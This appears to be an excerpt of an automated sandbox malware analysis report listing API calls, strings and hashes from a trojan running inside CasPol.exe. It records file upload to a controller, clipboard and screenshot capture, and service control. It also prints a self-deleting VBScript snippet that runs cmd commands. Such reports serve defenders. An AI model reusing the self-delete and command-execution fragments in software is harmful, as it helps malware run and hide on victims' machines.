                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                                                                                          • API String ID: 3086580692-2596673759
                                                                                                                                                                          • Opcode ID: 24d810a3f019c87a23bb815d1b7d5752fc2f7c92a672c11a81405aaa153c8293
                                                                                                                                                                          • Instruction ID: 2d1ece25e1b497defd969945f9de4b01d63c4d7912a1bb42583949d7b10afa87
                                                                                                                                                                          • Opcode Fuzzy Hash: 24d810a3f019c87a23bb815d1b7d5752fc2f7c92a672c11a81405aaa153c8293
                                                                                                                                                                          • Instruction Fuzzy Hash: 76B1A0316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB9B
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$h]v$open
                                                                                                                                                                          • API String ID: 1913171305-1625270436
                                                                                                                                                                          • Opcode ID: 3db2f40e860cf368b09a492d058d5dd719d2791db20602249bb2ee0439c4b327
                                                                                                                                                                          • Instruction ID: 050033375253242a90a907d975c9615f3488646990559cd5331657e2136e0730
                                                                                                                                                                          • Opcode Fuzzy Hash: 3db2f40e860cf368b09a492d058d5dd719d2791db20602249bb2ee0439c4b327
                                                                                                                                                                          • Instruction Fuzzy Hash: 514139319001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E4ACA98
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                                                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00455946
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                                                          • GetFileType.KERNEL32 ref: 00455D82
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID: \&G$\&G$`&G
                                                                                                                                                                          • API String ID: 269201875-253610517
                                                                                                                                                                          • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                                                          • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 65535$udp
                                                                                                                                                                          • API String ID: 0-1267037602
                                                                                                                                                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                                                          • _free.LIBCMT ref: 0043A9C3
                                                                                                                                                                          • _free.LIBCMT ref: 0043A9CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2441525078-0
                                                                                                                                                                          • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                                                          • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                          • String ID: h}v$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                          • API String ID: 489098229-3593927388
                                                                                                                                                                          • Opcode ID: df8985ce71915ac21d345ddac439bcb618be758bcb26d94f348ce4de2b74d619
                                                                                                                                                                          • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                                                                                                                                                          • Opcode Fuzzy Hash: df8985ce71915ac21d345ddac439bcb618be758bcb26d94f348ce4de2b74d619
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                                          • GetMessageA.USER32 ref: 0040556F
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                          • API String ID: 2956720200-749203953
                                                                                                                                                                          • Opcode ID: 7f9d91d774aaf11f537ab5c9a6bd98a6d2ee02cba41905de299277e71e7619bb
                                                                                                                                                                          • Instruction ID: af141abdc89e6f99b360bf73ca1bd21391e8bea30a055eafc68b1e1601de11b4
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f9d91d774aaf11f537ab5c9a6bd98a6d2ee02cba41905de299277e71e7619bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F419E71604301ABCB14FB76DC5A86F37A9AB85704F40493EF516A32E1EF3C8905CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                                          • String ID: <$@$@VG$@VG$Temp
                                                                                                                                                                          • API String ID: 1704390241-1291085672
                                                                                                                                                                          • Opcode ID: a898e8ea603c6d29ef1db25c24ba6d7d39ce6cebeacd4bf41c53a35aa07d7c32
                                                                                                                                                                          • Instruction ID: 17e4c8e037c7e297ff37edeb8814921eaebe5ca95f3622e3753009d7d6553322
                                                                                                                                                                          • Opcode Fuzzy Hash: a898e8ea603c6d29ef1db25c24ba6d7d39ce6cebeacd4bf41c53a35aa07d7c32
                                                                                                                                                                          • Instruction Fuzzy Hash: 15417E319002199ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                          • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                          • API String ID: 2172192267-604454484
                                                                                                                                                                          • Opcode ID: ef8ae9684d7664f06594f68475fd3be679d13b7539e96e01851bed788577736d
                                                                                                                                                                          • Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
                                                                                                                                                                          • Opcode Fuzzy Hash: ef8ae9684d7664f06594f68475fd3be679d13b7539e96e01851bed788577736d
                                                                                                                                                                          • Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                                                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 004481B5
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 004481C1
                                                                                                                                                                          • _free.LIBCMT ref: 004481CC
                                                                                                                                                                          • _free.LIBCMT ref: 004481D7
                                                                                                                                                                          • _free.LIBCMT ref: 004481E2
                                                                                                                                                                          • _free.LIBCMT ref: 004481ED
                                                                                                                                                                          • _free.LIBCMT ref: 004481F8
                                                                                                                                                                          • _free.LIBCMT ref: 00448203
                                                                                                                                                                          • _free.LIBCMT ref: 0044820E
                                                                                                                                                                          • _free.LIBCMT ref: 0044821C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 100059EA
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 100059F6
                                                                                                                                                                          • _free.LIBCMT ref: 10005A01
                                                                                                                                                                          • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                          • _free.LIBCMT ref: 10005A17
                                                                                                                                                                          • _free.LIBCMT ref: 10005A22
                                                                                                                                                                          • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                          • _free.LIBCMT ref: 10005A38
                                                                                                                                                                          • _free.LIBCMT ref: 10005A43
                                                                                                                                                                          • _free.LIBCMT ref: 10005A51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                          APIs
